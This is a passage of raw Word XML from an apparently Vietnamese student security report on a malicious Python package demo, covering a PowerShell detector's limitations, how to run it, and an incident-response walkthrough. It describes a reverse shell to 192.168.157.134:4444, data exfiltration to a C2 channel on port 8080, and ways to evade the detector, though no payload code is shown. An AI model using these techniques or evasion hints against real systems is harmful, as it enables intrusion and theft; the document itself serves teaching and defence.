      <w:tr w:rsidR="004D4D10" w14:paraId="14A6544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B9B804F" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>False positive có thể xảy ra</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7961B69" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Python kết nối các domain hợp pháp khác (github.com, conda.io...) ngoài PyPI CDN đã whitelist → vẫn bị flag. Cần mở rộng whitelist hoặc dùng DNS-based filtering.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="688C37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4BFBE60F" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Dễ bypass nếu đổi tên file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="57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19B5A51E" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ProcessName -match 'python' không bắt được nếu attacker dùng PyInstaller (bundled .exe) hoặc rename binary. Cần kiểm tra thêm đường dẫn và chữ ký số.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="71F842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328925" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Polling 3 giây = detection gap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C43A2A" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker có 3 giây tự do trước mỗi lần check. Giải pháp tốt hơn: ETW (Event Tracing for Windows) hoặc WMI event subscription — event-driven thay vì polling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="02B30595"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5C189839" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cần quyền Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="57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3694BA12" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Get-NetTCPConnection và Get-Process cần elevated privilege. Ghi rõ yêu cầu: chạy PowerShell as Administrator.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28E9CBB8" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C391A3A" w14:textId="614C4F40" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc227470583"/>
      <w:r>
        <w:t xml:space="preserve">C.3 — </w:t>
      </w:r>
      <w:r w:rsidR="002D1355">
        <w:t>Cách chạy Detector  và k</w:t>
      </w:r>
      <w:r>
        <w:t>ết quả phát hiện</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="05192A4E"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 xml:space="preserve"># Bước 1: Mở PowerShell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3178B1A7"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 Bước 2: Cho phép chạy script trong phiên hiện tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4419CC"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Set-ExecutionPolicy Bypass -Scope Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159EA7EA"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 Chọn Y khi được hỏi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029C78C7"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 Bước 3: Gọi script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D229AF" w14:textId="77777777" w:rsidR="002D1355" w:rsidRDefault="002D1355" w:rsidP="002D1355">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>C:\S04Demo\detector.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B3282D" w14:textId="46223A2D" w:rsidR="002D1355" w:rsidRDefault="002D1355">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc227360092"/>
      <w:bookmarkStart w:id="22" w:name="_Toc227416481"/>
      <w:bookmarkStart w:id="23" w:name="_Toc227470584"/>
      <w:r w:rsidRPr="00322BCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A1EAB03" wp14:editId="6823FDAA">
            <wp:extent cx="5960110" cy="913130"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="4778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83629" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="913130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="25AFFF62" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Khi chạy detector trong khi payload đang hoạt động, script phát hiện thành công tiến trình python.exe (PID 8164) đang duy trì kết nối ESTABLISHED về 192.168.157.134:4444 và hiển thị cảnh báo kèm đường dẫn thực thi đầy đủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE5240C" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50A4CB35" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Đây là xác nhận quan trọng: detector quan sát được đúng IOC tương ứng với kịch bản PoC. Nhóm không chỉ tạo được payload hoạt động mà còn chứng minh hành vi đó để lại dấu hiệu đủ rõ để bị phát hiện bằng công cụ giám sát mức máy trạm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D148AFE" w14:textId="0C9544CA" w:rsidR="004D4D10" w:rsidRDefault="009211D7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="009E5BA7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="557CA211" wp14:editId="6CAAA9AA">
            <wp:extent cx="5960110" cy="1633855"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="47634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3788" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="1633855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78250AD6" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc227470585"/>
      <w:r>
        <w:t>C.4 — Demo vòng đời: Phát hiện → Ứng phó → Xác nhận</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="1383F089" w14:textId="77777777" w:rsidR="009211D7" w:rsidRDefault="009211D7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>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4D4D10" w14:paraId="4035AC9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401DA868" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Bước</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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40" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4CD27094" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Thao tác và kết quả quan sát</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="4299DB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2AF9FD" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1. Detector phát hiện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9C556A6" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Script in ALERT: python.exe PID 8164 kết nối ESTABLISHED về 192.168.157.134:4444. Ghi log ra detector_audit.log.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="50DC8F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2392E600" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2. Victim gỡ package</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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558E5841" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pip uninstall safe-demo-pkg -y — xóa package khỏi site-packages.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="710F99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880C66D" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3. Chạy lại Detector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F4910A0" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tiến trình 8164 VẪN CÒN trong danh sách — gỡ package không kill tiến trình đang chạy. Đây là bài học quan trọng về incident response.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="2E734A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7E7F9E81" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4. Xem Get-Process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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00F0BC45" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Get-Process cho thấy PID 8164 đang chạy với đường dẫn python.exe — xác nhận tiến trình detached còn sống.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="31D3E0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80B7859" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5. Kill tiến trình</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B14A392" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>taskkill /PID 8164 /F — buộc tắt python.exe độc hại.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="1E6A76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286523D5" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6. Xác nhận phía Attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6400" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F8FF"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4B1C7968" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Shell trên Ubuntu ngắt kết nối ngay lập tức. Kênh C2 (port 8080) vẫn giữ dữ liệu đã nhận — exfiltration đã hoàn tất trước đó.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="0A23E91A" w14:textId="77777777" w:rsidTr="009211D7">
        <w:trPr>
          <w:trHeight w:val="32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55EE9FA" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7. Chạy lại Detector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431906" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>'System Clear: No active threats detected.' — hệ thống đã sạch.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="176A74CB" w14:textId="29BFEDBC" w:rsidR="009211D7" w:rsidRDefault="009211D7" w:rsidP="009211D7">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1. Detector phát hiện</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0F60AB" w14:textId="77777777" w:rsidR="009211D7" w:rsidRDefault="009211D7" w:rsidP="009211D7">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r w:rsidRPr="009E5BA7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3299117A" wp14:editId="35403F93">
            <wp:extent cx="5960110" cy="1633855"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="91280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3319" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="1633855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFC608D" w14:textId="77777777" w:rsidR="009211D7" w:rsidRDefault="009211D7" w:rsidP="009211D7">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2. Victim gỡ package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F10F8A8" w14:textId="77777777" w:rsidR="009211D7" w:rsidRDefault="009211D7" w:rsidP="009211D7">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CD3C476" wp14:editId="6324EFCE">
            <wp:extent cx="5960110" cy="607060"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="11598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8280" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="607060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7920338C" w14:textId="77777777" w:rsidR="009211D7" w:rsidRDefault="009211D7" w:rsidP="009211D7">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3. Chạy lại Detector</w:t>
      </w:r>
      <w:r w:rsidRPr="00D52A52">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B10A54E" wp14:editId="68A2514A">
            <wp:extent cx="5960110" cy="1070610"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="112754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45409" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="1070610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63667F10" w14:textId="77777777" w:rsidR="009211D7" w:rsidRDefault="009211D7" w:rsidP="009211D7">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4.Xem Get-Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2576BB" w14:textId="77777777" w:rsidR="009211D7" w:rsidRDefault="009211D7" w:rsidP="009211D7">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E5BA7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36156750" wp14:editId="6E294353">
            <wp:extent cx="5960110" cy="3681730"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="36945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51409" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="3681730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E48CFAF" w14:textId="77777777" w:rsidR="009211D7" w:rsidRDefault="009211D7" w:rsidP="009211D7">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4. Kill tiến trình</w:t>
      </w:r>
      <w:r w:rsidRPr="00D52A52">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009E5BA7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4008AA22" wp14:editId="2773B23F">
            <wp:extent cx="5960110" cy="568325"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="62483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36939" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="568325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5427D8" w14:textId="77777777" w:rsidR="009211D7" w:rsidRDefault="009211D7" w:rsidP="009211D7">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5. Xác nhận phía Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498956F2" w14:textId="77777777" w:rsidR="009211D7" w:rsidRDefault="009211D7" w:rsidP="009211D7">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Shell đã bị thoát</w:t>
      </w:r>
      <w:r w:rsidRPr="009E5BA7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C89D0D6" wp14:editId="6E1D7330">
            <wp:extent cx="5960110" cy="4273550"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="19335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5878" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="4273550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D954B6" w14:textId="77777777" w:rsidR="009211D7" w:rsidRDefault="009211D7" w:rsidP="009211D7">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Còn kênh C2 vẫn giữ được thông tin đã loot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109398F2" w14:textId="77777777" w:rsidR="009211D7" w:rsidRDefault="009211D7" w:rsidP="009211D7">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E5BA7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AD8E348" wp14:editId="6D944241">
            <wp:extent cx="5960110" cy="2017395"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="13285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58941" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="2017395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="095F32B1" w14:textId="77777777" w:rsidR="009211D7" w:rsidRDefault="009211D7" w:rsidP="009211D7">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6. Chạy lại Detector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24285B50" w14:textId="77777777" w:rsidR="009211D7" w:rsidRDefault="009211D7" w:rsidP="009211D7">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
